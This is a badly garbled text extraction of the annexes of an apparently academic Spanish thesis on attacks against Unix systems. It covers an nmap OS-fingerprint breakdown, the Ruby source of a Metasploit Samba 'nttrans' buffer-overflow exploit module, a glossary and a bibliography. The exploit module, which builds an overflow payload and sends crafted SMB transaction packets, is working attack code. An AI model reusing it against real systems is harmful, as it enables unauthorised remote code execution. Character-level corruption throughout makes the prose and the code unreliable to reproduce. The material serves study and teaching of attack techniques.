00:0,:(9:<1:#(:(6 9=3>are: No eDa!t O. mat!'e for 'o t 98f Eou 6no> >'at O. i running on it4 ee 'ttp:;;in e!ure.org;nmap; ubmit; :. 2$*/I* 6ingerprint: 4-:-$%9!JR..1 W)R./2W42R21W$2R1W$FR 0..0W*JR8W)-R1WBR8 WGR000$29W2GR.0+ $(1. 4-:W*R,86N6.&un=no>n&linu,&gnu"-CH!-*R101WB$)R2WI-/R108W2IRIWIIRIW--RW2-R2 4-:1"-CH!-*R100WB$)R1WI-/R10CW2IRIWIIRIW--RW2-R20"-CH!-*R10.WB$)R1WI-/R10% 4-:W2IRIWIIRIW--R-W2-R21"-CH!-*R101WB$)R1WI-/R108W2IRIWIIRIW--RW2-R20"-CH! 4-:-*R101WB$)R1WI-/R100W2IRIWIIRIW--RW2-R21"4*-!41RG1(.9L -211W42RG1089L 4-:211W4 RG2809L 99211W4.RG1(.9L -211W41RG2189L -211W46RG109-211"LI9!L1R+ ++ 4-:+WL2R++++WL R++++WL.R++++WL1R++++WL6R++++"C$9!/R8W)+R8W2R.0WLR++++ W4RG1( 4-:.9L -79W$$R9WHR"21!/R8W)+R8W2R.0W-R4W%R-TW+R%-W/)R0WHR"22!/R9"2 !/R8

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *O5 de 2*.

Ane9o C. ( Ane9o C. Análisis de una /ir a FC!&7!
W)+R 4-:8W2R.0WLR++++W-R4W%R-TW+R%-W4RG1099L -211W/)R0WHR"2.!/R8W)+R8 W2R.0WLR0W4-:R%W%RXW+R/W4RW/)R0WHR"21!/R8W)+R8W2R.0WLR0W-RXW%R-TW+R%/W4R W/)R0WHR"26!/ 4-:R8W)+R8W2R.0WLR0W-R%W%RXW+R/W4RW/)R0WHR"20!/R8W)+R8W2R.0WLR0W-RXW%RW+R% 4-:/W4RW/)R0WHR"F1!/R8W)+R9W2R.0W24-R0WI*7R 8WF9R0W/I*7RBW/I)RBW/I*$:RB W/F$ 4-::RBW/F7RBW/F)RB"IC!/R8W)+IR-W2R.0W24-IR-W$)R-W-IR-W)7IR-" Kptime: 0.000 7aE 9 in!e &e7 #pr ( 15:06:09 (00): Net>or6 Di tan!e: 1 'op T,P .equen!e Pre7i!tion: Diffi!u"tE1(61 9Hoo7 "u!6`: 8P 8D .equen!e Heneration: 8n!rementa" $ea7 7ata fi"e from: ;'ome;mar!e"o; r!;nmap;; 'are;nmap O. 7ete!tion performe7. P"ea e report anE in!orre!t re u"t at 'ttp:;;in e!ure.org;nmap; ubmit; . Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in (7.031 e!on7 $a> pa!6et ent: (09) 996.1(05C: F $!@7: 1790 973.66+5C:

Co o se "uede ver# los C<etr'ing ?, detection ;tr' c*>D in/or an sobre la ejecuci8n de cada uno de los 5 tests detallados en el a"artado 5.*.*. :uego# co o no "osee la /ir a del ,? re oto en su B5# @ a" la i "ri e "or "antalla. El ,? en cuesti8n es un FreeB,5 +..# cu'a /ir a la versi8n 1.5- de @ a" aGn no "osee*+5. :uego de "rocesar un "oco el te9to del /inger"rint ;i "reso as) "or @ a" a "ro"8sito "ara /acilitar el "roceso de re"orte del "ri era instancia%
-$%9!=1+.53 D1+;( OT1(1 ,T11 ,K130++7 P=1/ D.11 H1/ 31000,(9 T31+7B3,C1+ P1D)6A6+-un6no>n-"inuD-gnu" -CH!.P1105 H,D1( 8.$110) T818 8818 ..1. T.1(1" -CH!.P1100 H,D11 8.$110< T818 8818 ..1. T.1(0" -CH!.P110+ H,D11 8.$110# T818 8818 ..1. T.1(1" -CH!.P1105 H,D11 8.$110) T818 8818 ..1. T.1(0" -CH!.P1105 H,D11 8.$1107 T818 8818 ..1. T.1(1" 4*-!O1135C+N&3.T11 O(1357)N&3.T11 O313()0N&3NNT11 O+135C+N&3.T11 O513(1)N&3.T11 O613109.T11" LI9!&11BBBB &(1BBBB &31BBBB &+1BBBB &51BBBB &61BBBB" C$9!$1/ DB1/ T1+0 &1BBBB O135C+N&3.2N ,,1N R1" 21!$1/ DB1/ T1+0 .1O #1.P B1#. $D10 R1" 22!$1N" 2 !$1/ DB1/ T1+0 &1BBBB .1O #1.P B1#. O13109N&3.T11 $D10 R1" 2.!$1/ DB1/ T1+0 &10 .1# #1U B1$ O1 $D10 R1" 21!$1/ DB1/ T1+0 &10 .1U #1.P B1#$ O1 $D10 R1" 26!$1/ DB1/ T1+0 &10 .1# #1U B1$ O1 $D10 R1" 20!$1/ DB1/ T1+0 &10 .1U #1. B1#$ O1 $D10 R1" F1!$1/ DB1N T1+0 TO.10 8P213) KN10 $8P21H $8D1H $8P,51H $K,51H $K21H $KD1H" IC!$1/ DB81. T1+0 TO.81. ,D1. .81. D281."

is o># se "uede obtener esto en

*+5 Cabe aclarar que la Glti a versi8n de @ a"# la 1.J. 'a inclu'e la /ir a de este ,? en su Base. Fa bién se "uede obtener la Glti a versi8n del arc$ivo con la base de /ir as de @ a" Cn a"( os(dbD en la siguiente 2<:% $tt"%&&n a".org&data&n a"(os(db ' luego ree "lazar el original. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *OJ de 2*.

Ane9o C. ( Ane9o C. Análisis de una /ir a FC!&7!

:o que "ri ero se $izo /ue% eli inar el "re/ijo C?,%D en cada l)nea ' agregar un /in de l)nea luego de cada "aréntesis de cierreH des"ués se unieron en una is a l)nea las cadenas que quedaron CcortadasD# ' se identi/ic8 con rojo los resultados de los di/erentes probes. !or Glti o# los s) bolos de "orcentaje se eli inaron ;s8lo indica una concatenaci8n># ' los "ará etros se colorearon con azul. :uego# "ara relacionar este /inger"rint con el "roceso e9"licado en el a"artado 5.*.*# se agregaron co entarios alrededor del te9to ' se agru"aron con res"ecto a cada test "ara /acilitar la co "rensi8n del lector# quedando de la siguiente anera%
N Dato 7e" e !aneo: =er i%n 7e Nmap4 P"ataforma4 Be!'a;?ora4 et!. -$%9!=1+.53 D1+;( OT1(1 ,T11 ,K130++7 P=1/ D.11 H1/ 31000,(9 T31+7B3,C1+ P1D)6A6+-un6no>n-"inuD-gnu" N .O $emoto BreeC.D 7.0-C<T#+ - 7.0-.T#C2< N N Probe T,P en@ia7o : N 1111111111111111 N Te t 1. Henera!i%n 7e .e!uen!ia 9.<R4 OP.4 &8N E T1:. N 1.1 Probe .<R. N Par]metro !a"!u"a7o por !a7a paquete re!ibi7o 7e" Te t 1: N .P: T,P 8.N equen!e pre7i!tabi"itE in7eD N H,D: T,P 8.N Hreate t !ommon 7enominator N 8.$: T,P 8.N !ounter rate N T84884..: T,P 8P8D4 8,3P 8P8D4 .'are7 8P8D N T.: T,P Time tamp option a"gorit'm -CH!.P1105 H,D1( 8.$110) T818 8818 ..1. T.1(1" -CH!.P1100 H,D11 8.$110< T818 8818 ..1. T.1(0" -CH!.P110+ H,D11 8.$110# T818 8818 ..1. T.1(1" -CH!.P1105 H,D11 8.$110) T818 8818 ..1. T.1(0" -CH!.P1105 H,D11 8.$1107 T818 8818 ..1. T.1(1" N 1.( Probe OP.: Op!ione T,P N Op!ione T,P obteni7a por !a7a paquete en@ia7o 7e" Te t 1: 4*-!O1135C+N&3.T11 O(1357)N&3.T11 O313()0N&3NNT11 O+135C+N&3.T11 O513(1)N&3.T11 O613109.T11" N 1.3 &8N: Tamafo 7e =entana T,P 8ni!ia" re!ibi7o por !a7a paquete N en@ia7o 7e" Te t 1. <n ?eDa7e!ima". LI9!&11BBBB &(1BBBB &31BBBB &+1BBBB &51BBBB &61BBBB" N 1.+ Probe T1: N Par]metro obteni7o en to7o "o paquete N abe que er]n to7o igua"e : N $: $e pon i@ene 9$: N DB: 9DonJt Bragment Cit: N T4TH: 8P 8nitia" TT24 8P 8nitia" TT2 Hue N .: T,P .equen!e number N #: T,P #!6 Number 9#: N B: T,P B"ag N $D: T,P $.T Data ,'e!6 um N R: T,P mi !. Ruir6 21!$1/ DB1/ T1+0 .1O #1.P B1#. $D10 R1" N Te t (. <!o 8,3P 98<:. en@ia7o 7e" Te t 1 9Ea e

9No a"ma!ena7o:

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *O+ de 2*.

Ane9o C. ( Ane9o C. Análisis de una /ir a FC!&7!
N Par]metro Obteni7o : N $: $e pon i@ene 9$: N DB8: DonJt Bragment Cit 8,3P N T4TH: 8P 8nitia" TT24 8P 8nitia" TT2 Hue N TO.8: 8P To. for 8,3P $e pon e N ,D: 8,3P $e pon e ,o7e N .8: 8,3P .equen!e Number N D28: 8P Data 2engt' for 8,3P $e pon e IC!$1/ DB81. T1+0 TO.81. ,D1. .81. D281."

9No a"ma!ena7o:

N Te t 3. T,P <Dp"i!it !onge tion notifi!ation 9<,N: N Par]metro Obteni7o : N $: $e pon i@ene 9$: N DB: 9DonJt Bragment Cit: N T4TH: 8P 8nitia" TT24 8P 8nitia" TT2 Hue 9No a"ma!ena7o: N &: T,P 8nitia" &in7o> .iOe N O: T,P Option N ,,: <Dp"i!it ,onge tion Notifi!ation N R: T,P 3i !. Ruir6 C$9!$1/ DB1/ T1+0 &1BBBB O135C+N&3.2N ,,1N R1" N Te t +. T,P. Probe T( a" T7. N Par]metro !a"!u"a7o por !a7a Probe: N $: $e pon i@ene 9$: N DB: 9DonJt Bragment Cit: N T4TH: 8P 8nitia" TT24 8P 8nitia" TT2 Hue 9No a"ma!ena7o: N &: T,P 8nitia" &in7o> .iOe N .: T,P .equen!e number N #: T,P #!6 Number N B: T,P B"ag N O: T,P Option N $D: T,P $.T Data ,'e!6 um N R: T,P 3i !. Ruir6 22!$1N" 2 !$1/ DB1/ T1+0 &1BBBB .1O #1.P B1#. O13109N&3.T11 $D10 R1" 2.!$1/ DB1/ T1+0 &10 .1# #1U B1$ O1 $D10 R1" 21!$1/ DB1/ T1+0 &10 .1U #1.P B1#$ O1 $D10 R1" 26!$1/ DB1/ T1+0 &10 .1# #1U B1$ O1 $D10 R1" 20!$1/ DB1/ T1+0 &10 .1U #1. B1#$ O1 $D10 R1" N Probe 5. KDP en@ia7o a un puerto !erra7o en e pera 7e un 8,3P Port N Knrea!'ab"e N Par]metro ,a"!u"a7o N $: $e pon i@ene 9$: N DB: 9DonJt Bragment Cit: N T4TH: 8P 8nitia" TT24 8P 8nitia" TT2 Hue 9No a"ma!ena7o: N TO.: 8P TEpe of .er@i!e N 8P2: 8P Tota" 2engt' N KN: Knu e7 port unrea!'ab"e fie"7 nonOero N $8P2: $eturne7 probe 8P tota" "engt' @a"ue N $8D: $eturne7 probe 8P 8D @a"ue N $8P,5: 8ntegritE of returne7 probe 8P !'e!6 um @a"ue N $K24$K,5: 8ntegritE of returne7 probe KDP "engt' an7 !'e!6 um N $KD: 8ntegritE of returne7 KDP 7ata F1!$1/ DB1N T1+0 TO.10 8P213) KN10 $8P21H $8D1H $8P,51H $K,51H $K21H $KD1H"

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *OO de 2*.

Ane9o 5. ( Ane9o 5. C8digo /uente de los E9"loits 2tilizados

Anexo D. /-di)o =uente de los Fxploits Utili3ados
A continuaci8n se adjunta el c8digo /uente del "ri er e9"loit de los dos utilizados en la secci8n +.2# "ág. *25. Está escrito en lenguaje <ub' ' utiliza el Metas"loit Fra eIor6 v-.*H se inclu'8 ésta versi8n ;' no la del 2.+> "orque e9"lota la vulnerabilidad en /or a si ilar ' la idea es los e9"loits con la Glti a versi8n del ostrar c8 o se "rogra an is o. Fa bién se encuentra online "ara su

consulta en la direcci8n% $tt"%&& arcelo/ernandez.in/o&tesis&nttrans.rb.
NN N M87: nttran .rb 5365 (00)-01-(7 0(:():11U '7m M NN NN N T'i fi"e i part of t'e 3eta p"oit Brame>or6 an7 maE be ubYe!t to N re7i tribution an7 !ommer!ia" re tri!tion . P"ea e ee t'e 3eta p"oit N Brame>or6 >eb ite for more information on "i!en ing an7 term of u e. N 'ttp:;;meta p"oit.!om;proYe!t ;Brame>or6; NN require Jm f;!oreJ module 3 f class <Dp"oit ::3u"ti::.amba::NTTran AO@erf"o> T 3 f::<Dp"oit::$emote in!"u7e <Dp"oit::$emote::.3C de6 initia"iOe9info 1 ab: super9up7ateAinfo9info4 JNameJ JDe !riptionJ b4 J#ut'orJ J2i!en eJ J=er ionJ J$eferen!e J 04 JPri@i"ege7J JPaE"oa7J a

1> J.amba nttran 1> Sqa

O@erf"o>J4

1> - J'7mJ 04 1> 3.BA28,<N.<4 1> JM$e@i ion: 5365 MJ4 1> - JC8DJ4 J7106J 04 - J,=<J4 J(003-00)5J 04 1> true4 1> J.pa!eJ 1> 10(+4 JCa7,'ar J 1> V[D00V4 J3inNop J 1> 51(4

JTarget J

1> -V.amba (.(.D 2inuD D)6V4 a J#r!'J 1> #$,?AG)64 JP"atformJ 1> J"inuDJ4 J$et J 1> -0D010(030+4 0D+1+(+3++04 b4 04 04 JDi !"o ureDateJ 1> J#pr 7 (003J:: regi terAoption 9-Opt::$PO$T9139:04 sel6.class:

b4

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *O0 de 2*.

Ane9o 5. ( Ane9o 5. C8digo /uente de los E9"loits 2tilizados
end de6 eDp"oit # $%$&'fc()& pattern 1 $eD::TeDt.patternA!reate91(000: pattern-53(4 +0 1 -0D)1b)+7!0.pa!69J=J: pattern-)364 paE"oa7.en!o7e7."engt'0 1 paE"oa7.en!o7e7 # $%$&'b&'*& !onne!t mbA"ogin targAa77re 1 0Dfffbb770

# # +end a ,TTrans request -ith Parameter.ountTotal set to the buffer length # ub!omman7 param bo7E etupA!ount etupA7ata data 1 param 1 1 1 1 1 P 1 JJ JJ 0 JJ bo7E

p6t 1 ,ON.T::.3CANTT$#N.AP5T.ma6eA tru!t sel6. imp"e.!"ient. mbA7efau"t 9p6t-JPaE"oa7J0-J.3CJ0: ba eAoff et 1 p6t.toA ."engt' P 9 etupA!ount Q (: - + paramAoff et 1 ba eAoff et 7ataAoff et 1 paramAoff et P param."engt' p6t-JPaE"oa7J0-J.3CJ0.@-J,omman7J0 1 ,ON.T::.3CA,O3ANTAT$#N.#,T p6t-JPaE"oa7J0-J.3CJ0.@-JB"ag 1J0 1 0D1) p6t-JPaE"oa7J0-J.3CJ0.@-JB"ag (J0 1 0D(001 p6t-JPaE"oa7J0-J.3CJ0.@-J&or7,ountJ0 1 19 P etupA!ount p6t-JPaE"oa7J0.@-JParam,ountTota"J0 11(000 p6t-JPaE"oa7J0.@-JData,ountTota"J0 1 bo7E."engt' p6t-JPaE"oa7J0.@-JParam,ount3aDJ0 1 10(+ p6t-JPaE"oa7J0.@-JData,ount3aDJ0 1 6550+ p6t-JPaE"oa7J0.@-JParam,ountJ0 1 param."engt' p6t-JPaE"oa7J0.@-JParamOff etJ0 1 paramAoff et p6t-JPaE"oa7J0.@-JData,ountJ0 1 bo7E."engt' p6t-JPaE"oa7J0.@-JDataOff etJ0 1 7ataAoff et p6t-JPaE"oa7J0.@-J.etup,ountJ0 1 etupA!ount p6t-JPaE"oa7J0.@-J.etupDataJ0 1 etupA7ata p6t-JPaE"oa7J0.@-J.ub!omman7J0 1 ub!omman7 p6t-JPaE"oa7J0.@-JPaE"oa7J0 1 data sel6. imp"e.!"ient. mbA en79p6t.toA : a!6 1 sel6. imp"e.!"ient. mbAre!@Apar e9,ON.T::.3CA,O3ANTAT$#N.#,T: # # +end a ,TTrans secondar/ request -ith the magic displacement # param 1 pattern bo7E 1 JJ data 1 param P bo7E p6t 1 ,ON.T::.3CANTT$#N.A.<,OND#$/AP5T.ma6eA tru!t sel6. imp"e.!"ient. mbA7efau"t 9p6t-JPaE"oa7J0-J.3CJ0: ba eAoff et 1 p6t.toA ."engt' - + paramAoff et 1 ba eAoff et 7ataAoff et 1 paramAoff et P param."engt'

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *0. de 2*.

Ane9o 5. ( Ane9o 5. C8digo /uente de los E9"loits 2tilizados
p6t-JPaE"oa7J0-J.3CJ0.@-J,omman7J0 1 ,ON.T::.3CA,O3ANTAT$#N.#,TA.<,OND#$/ p6t-JPaE"oa7J0-J.3CJ0.@-JB"ag 1J0 1 0D1) p6t-JPaE"oa7J0-J.3CJ0.@-JB"ag (J0 1 0D(001 p6t-JPaE"oa7J0-J.3CJ0.@-J&or7,ountJ0 1 1) p6t-JPaE"oa7J0.@-JParam,ountTota"J0 1 param."engt' p6t-JPaE"oa7J0.@-JData,ountTota"J0 1 bo7E."engt' p6t-JPaE"oa7J0.@-JParam,ountJ0 1 param."engt' p6t-JPaE"oa7J0.@-JParamOff etJ0 1 paramAoff et p6t-JPaE"oa7J0.@-JParamDi p"a!eJ0 1 targAa77re p6t-JPaE"oa7J0.@-JData,ountJ0 1 bo7E."engt' p6t-JPaE"oa7J0.@-JDataOff etJ0 1 7ataAoff et p6t-JPaE"oa7J0.@-JPaE"oa7J0 1 data sel6. imp"e.!"ient. mbA en79p6t.toA : a!6 1 sel6. imp"e.!"ient. mbAre!@Apar e9,ON.T::.3CA,O3ANTAT$#N.#,TA.<,OND#$/: 'an7"er end en7 en7

Con res"ecto al segundo e9"loit# "or una cuesti8n estricta ente de es"acio# se o iti8 su inclusi8n aqu). ,in e bargo# se encuentra online# en la siguiente direcci8n% $tt"%&& arcelo/ernandez.in/o&tesis&-1O.c El is o consiste en *12O l)neas escritas en lenguaje C# ' s8lo necesita un ,? ti"o 2ni9 ' un co "ilador de C ;t)"ica ente PCC> "ara ser co "ilado ' ejecutado. /omo conclusi-n 9a! que resaltar la ventaja que o=rece 1A2 para la creaci-n de exploits% !a que provee un entorno pro(ado con componentes reutili3a(les ! extensi(les para el desarrollo% creaci-n e investi)aci-n de exploits.

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *0* de 2*.

Ane9o E. ( Ane9o E. Plosario de Fér inos

Anexo F. Mlosario de Términos
A4I% 4pplication Programming 6nterface ;C7nter/az de !rogra aci8n de A"licaci8nD> es un tér ino que re"resenta la inter/az o ca"a de so/tIare que brinda un deter inado "rogra a "ara ser utilizado "or otro. Esto "er ite la reutilizaci8n de so/tIare. !or eje "lo# si un "rogra a necesita encri"tar ciertos datos# "uede $acer uso de un biblioteca de ci/rado de datos $ec$a "or terceros# utilizando su A!7 "ara co unicarse con ella. 2n ,iste a ?"erativo ta bién "rovee A!7s a sus di/erentes co "onentes "ara los "rogra as que se ejecuten sobre él. AR4% Es un "rotocolo de Ca"a 2&- del odelo ?,7# sirve "ara resolver direcciones de Ca"a 2 dada ediante una "etici8n A<! la obtiene. a'or)a de los "rotocolos enviar un ensaje de una direcci8n de Ca"a -. !or eje "lo# teniendo la direcci8n 7! de un servidor# un cliente "ara co unicarse debe saber la direcci8n MACH CanuncioD al cliente que se conecta. Este )anner D>Titular?E% Es una "ráctica co Gn de la

ensaje se lla a 5anner en la jerga.

/luster% Conjunto de co "utadoras que trabajan en gru"o ' actGan co o un nodo Gnico e indivisible# en "os de lograr un objetivo su ando el recurso de cada uno de sus co "onentes. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&Co "uterUcluster D1S: Sona Desmilitari3ada ;C(emilitari$ed KoneD>. !arte de la red de una organizaci8n que está direccionada ' accesible "Gblica ente desde 7nternet ;general ente># se"arada de la :A@ de la is a. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&5e ilitarizedUzoneU]2Oco "uting]20 DNA% (omain Game S1stem H ,iste a de @o bres de 5o inio. Es un servicio a "lia ente utilizado# que tiene el objetivo de traducir no bres del ti"o $ost.do inio ;"or eje "lo III.unlu.edu.ar> a una direcci8n 7!# "or eje "lo# 2...**..*O5.21J. DoA: Dene)aci-n de Aervicio ;C(enial of ServiceD>. Error de un so/tIare ;general ente un servicio de red> al anejar ciertos datos de entrada o condiciones que "rovocan que el nor al ás situaciones% odi/icadas># dese "eBo del servicio reduzca su velocidad ;'a que su consu o de C!2# <AM u otros recursos crece indiscri inada ente># $asta volverlo ino"erable. El tér ino abarca etc. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&5enialUo/Uservice Fntrada Fstándar DATDINE% Aalida Fstándar DATD0UTE% Aalida de Fstándar de Frrores DATDFRRE% ,on canales de co unicaci8n con el entorno que e9isten "or cada "roceso 2ni9 del siste a. <e"resentan la entrada de datos# otro la salida ' el Glti o la salida de res"ectiva ente. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&,tandardUstrea s Lo): 2na entrada de log es uno o ás registros al acenados en algGn arc$ivo que re"resenta un evento en "articular# co o una alerta# con el objetivo de guardar un rastro de auditor)a que será le)do "or el ad inistrador del siste a. 2rame@or:% En so/tIare# un frame.ork ;C arco de trabajoD en inglés> es una biblioteca de "rogra aci8n "ensada co o un gran C"aqueteD que resuelve un cierto "roble a con un nivel de abstracci8n u' grande "ara el "rogra ador que la utiliza. !uede contener o requerir varias bibliotecas "ara su correcto /unciona iento. Ler% $tt"%&&III.code"roject.co &RB&arc$itecture&4$at7sAFra eIor6.as"9 Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *02 de 2*. ensajes de error. !or de/ecto ;' co Gn ente> son el teclado# la "antalla ' la "antalla ta bién o un arc$ivo de log# interru"ci8n o alteraci8n de la cone9i8n de red# saturaci8n de "eticiones ;nor ales o

Ane9o E. ( Ane9o E. Plosario de Fér inos Fa bién% $tt"%&&en.Ii6i"edia.org&Ii6i&,o/tIareU/ra eIor6 8ilos D*hreadsE% :os ,?s consu en todos los odernos "roveen un ecanis o de "rocesos ClivianosD o t$reads# que e oria con el "roceso "rinci"al que los crea# u' co Gn en ' a di/erencia de los "rocesos C"esadosD# co "arten enos recursos ' requieren ,iste as. Ler%

enos ca bios de conte9to# entre otras ventajas. :a

desventaja es el au ento de la co "lejidad# "ero $o' en d)a es una caracter)stica $tt"%&&en.Ii6i"edia.org&Ii6i&F$readU]2Oco "uterUscience]20 8as9% 2n Has o /unci8n de dis"ersi8n es una /unci8n

$tt"%&&en.Ii6i"edia.org&Ii6i&!rocessU]2Oco "uting]20

ate ática que a "artir de un "ará etro de

entrada# genera un valor Gnico de salida ;cu'as "robabilidades de ser generado "or otro "ará etro son )n/i as>. =a' algorit os de $as$ estándar# co o "or eje "lo M55 ' ,=A(*. Ler%$tt"%&&en.Ii6i"edia.org&Ii6i&Cr'"togra"$icU$as$U/unction 8one!pot% 2n $one'"ot ;Ctarro de ielD> es un siste a Ctra "aD instalado adrede "ara ca"tar la onitorear los intentos de atenci8n de "osbiles intrusos# "robable ente con vulnerabilidades sencillas de vencer# con el objetivo de desviar la atenci8n de los $osts que s) son de i "ortancia ' ataque "ara bloquearlos ' a"render las técnicas utilizadas "or los intrusos. NAT Q +etwork Address *ranslation ;Fraducci8n de 5irecciones de <ed>% Fécnica "ara reescribir la direcci8n origen o destino de un "aquete 7! en un dis"ositivo que aneja dic$os "aquetes. !or u' /recuentes ta bién. eje "lo# es e "leada co Gn ente en los dis"ositivos de acceso a internet "ara Ccon utarD una Gnica 7! "Gblica entre varias 7!s "rivadas de una :A@# entre otros usos Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&@etIor6UaddressUtranslation 0=uscaci-n ;so/tIare>% Fécnica que odi/ica sustancial ente un "rogra a sin alterar su edida su /unciona iento original# con el objetivo de Cca u/larloD o di/icultar en gran del "rogra a. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&?b/uscatedUcode 0pcode% 2na instrucci8n de "rocesador se co "one general ente "or un c8digo de o"eraci8n ' dos o"erandos. El "ri ero en inglés se lo abrevia co o ?"code# que básica ente indica qué $acer con los dos o"erandos que se le indica. !or eje "lo# en lenguaje ensa blador# CM?L AA# BAD es una instrucci8n donde se co"ia el contenido del registro BA al AA ;segGn la no enclatura de 7ntel># ' M?L es el ?"code. ?tros ?"codes CM!# Call# A55# M2:# !2,=# !?!# etc. Ler% Fabla rá"ida de ?"codes O.OJ% $tt"%&&III.jegerle$ner.co &intel&o"codeUes.$t l 7ntel Arc$itecture ,o/tIare 5evelo"erMs Manual# Lolu e 2% 7nstruction ,et <e/erence Manual% $tt"%&&develo"er.intel.co &design&"entiu & anuals&21-*0*.$t 4enetration Testin)% Fest de "enetraci8nH se lo conoce co o un "roceso t)"ico de las auditor)as de seguridad# donde se si ula ser un crac6er intentando vulnerar la seguridad de una organizaci8n o de un siste a de la is a. 4rox!% 2n "ro9' es un so/tIare o dis"ositivo que o/icia de inter ediario entre un cliente ' un servidor. !or eje "lo# un "rogra a establece cone9i8n con el "ro9' ' le "ide acceder a un cierto equi"o&servicio# "or eje "lo una "ágina IebH el "ro9' accede "or él ' lo devuelve al "rogra a original# evitando que éste tenga que acceder directa ente al "roveedor. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *0- de 2*. u' co unes en la arquitectura 9OJ inclu'en JM!#

co "rensi8n "or "arte de terceros. Co o e/ecto colateral "uede signi/icar ta bién una co "resi8n

Ane9o E. ( Ane9o E. Plosario de Fér inos RTT% :ound -rip -ime N Fie "o de Liaje 7da ' Luelta. Lalor general ente edido en

ilisegundos que esti a el tie "o entre el env)o ' rece"ci8n de un "aquete al ' desde el destino. !uede decirse que el dela1# latencia o de ora que introduce la red entre dos $osts es igual a <FF dividido 2. Acript% 2n scri"t es un "rogra a que general ente e9tiende a una a"licaci8n# escrita en un lenguaje inter"retado ' que t)"ica ente se encarga de auto atizar tareas. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&,cri"tingUlanguage A9ell% ,i bien en castellano la traducci8n literal es Cconc$aD o CcáscaraD# en el a biente in/or ático se la conoce ta bién co o CConsolaD o CFer inalDH es una inter/az que "rovee el siste a al usuario en /or ato de te9to# que ace"ta 8rdenes o co andos que luego el siste a ejecuta. Fa bién se la suele lla ar C:7# "or Co and :ine 7nter/ace ;C7nter/az de :)nea de a'or)a de Co andoD># ant8ni o de P27 N Pra"$ical 2ser 7nter/ace ;C7nter/az Prá/ica de 2suarioD>. Aoc:ets Ra@% Es una A!7 de la ca"a de <ed de un ,iste a ?"erativo# "resente en la pa1load. @ a" ' la gran ellos# que "rovee acceso co "leto a los encabezados de las tra as a enviar ' recibidas# no s8lo al a'or)a de los "ort scanners o $erra ientas de red $acen uso de ella. ,poofing% C!arodiaD en castellano. CSpoofingD trata de un conjunto de técnicas "ara /alsi/icar ' $acer "asar un ele ento inválido o no autorizado "or otro que s) lo está. AA8% Secure SHell ;C,$ell ,eguroD en castellano>. !rotocolo de red que brinda una inter/az de co andos a una áquina en /or a re otaH a di/erencia de Felnet# <login# etc.# ,,= brinda autenticaci8n "or !R7 ' encri"taci8n del trá/ico. AAL% ,ecure ,oc6ets :a'er# Ca"a de ,oc6ets ,eguro. Es una versi8n anterior de lo que a$ora es F:,# con los is os objetivos ' caracter)sticas. utua ' encri"taci8n "ara "rotocolos /iables de la Ca"a de Frans"orte odelo FC!&7!>. TLA% Frans"ort :a'er ,ecurit'# ,ecuridad en la Ca"a de Frans"orte. Es un "rotocolo de seguridad que "rovee autenticaci8n del Modelo ?,7 ;FC! en el

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *01 de 2*.

&i(lio)ra=6a
A<!AUFF7% Ar"anet ( F$e First 7nternet# $tt"%&&III.livinginternet.co &i&ii.$t A<FUA!!F7@P% F$e Art o/ Finger"rinting ( ,lides# $tt"%&& d.$udora.de&"resentations&citunderground2..5(2 BE::% Multics Peneral 7n/or ation and FAV# $tt"%&&III.bell( labs.co &$istor'&uni9&so et$ingelse.$t l CMUFA.% F$e FA(.% 7ts "ast and "resent# $tt"%&&ed(t$elen.org&co "( $ist&F$eCo "Mus<e"&FCM<(L.O.$t l C<AK%,e' our Cra'. Autor% Cra' 7nc.# $tt"%&&III.cra'.co &aboutUcra'&se' ourcra'.$t l C,C?U7@EFBA,%7nternetIor6ing Basics. Autor% Cisco ,'ste s# $tt"%&&III.cisco.co &en&2,&docs&internetIor6ing&tec$nolog'&$andboo6&7ntro(to(7nternet.$t l C2=7% Colu bia 2niversit' Co "uting =istor'# $tt"%&&III.colu bia.edu&acis&$istor'&"d"*..$t l CKBPE?% A<!A@et :ogical Ma"# $tt"%&&III.c'bergeogra"$'.org&atlas&$istorical.$t l 5EC(4EB% F$e 5EC E ulation 4eb !age# $tt"%&&III.aracnet.co &`$eal'z$&dece u.$t l EB=:%F$e =eroic =ac6er% :egends o/ t$e Co "uter Age. Autor% Eri6 Bunvand# $tt"%&&III.cs.uta$.edu&`elb&/ol6lore&a/s("a"er&a/s("a"er.$t l E<B=%=oI Fo Beco e a =ac6er. Autor% Eric ,teven <a' ond# $tt"%&&catb.org&`esr&/aqs&$ac6er( $oIto.$t l E<==%A Brie/ =istor' o/ =ac6erdo . Autor% Eric ,teven <a' ond# $tt"%&&III.tu9edo.org&`esr E<JF% F$e Jargon File# $tt"%&&catb.org&jargon& E<JF=%Fér ino M$ac6erM. Autor% Larios# Eric <a' ond# $tt"%&&III.catb.org&jargon&$t l&=&$ac6er.$t l F7@PU!A,%RnoI Kour Ene '% !assive Finger"rinting. Autor% Craig , it$# !eter Prundl # $tt"%&&"roject.$one'net.org&"a"ers&/inger& F,F% Free ,o/tIare Fundation# $tt"%&&III./s/.org& F4A:R%FireIal6ing ( A Fraceroute(:i6e Anal'sis o/ 7! !ac6et <es"onses to 5eter ine PateIa' Access Control :ists. Autor% 5avid Polds it$# Mic$ael ,c$i// an# $tt"%&&III."ac6et/actor'.net&/ireIal6&/ireIal6(/inal."d/ P@2% P@2% P@2 is not 2ni9# $tt"%&&III.gnu.org& =ACRUBA,7C,%=ac6ing% F$e Basics. Autor% Qac$ar' 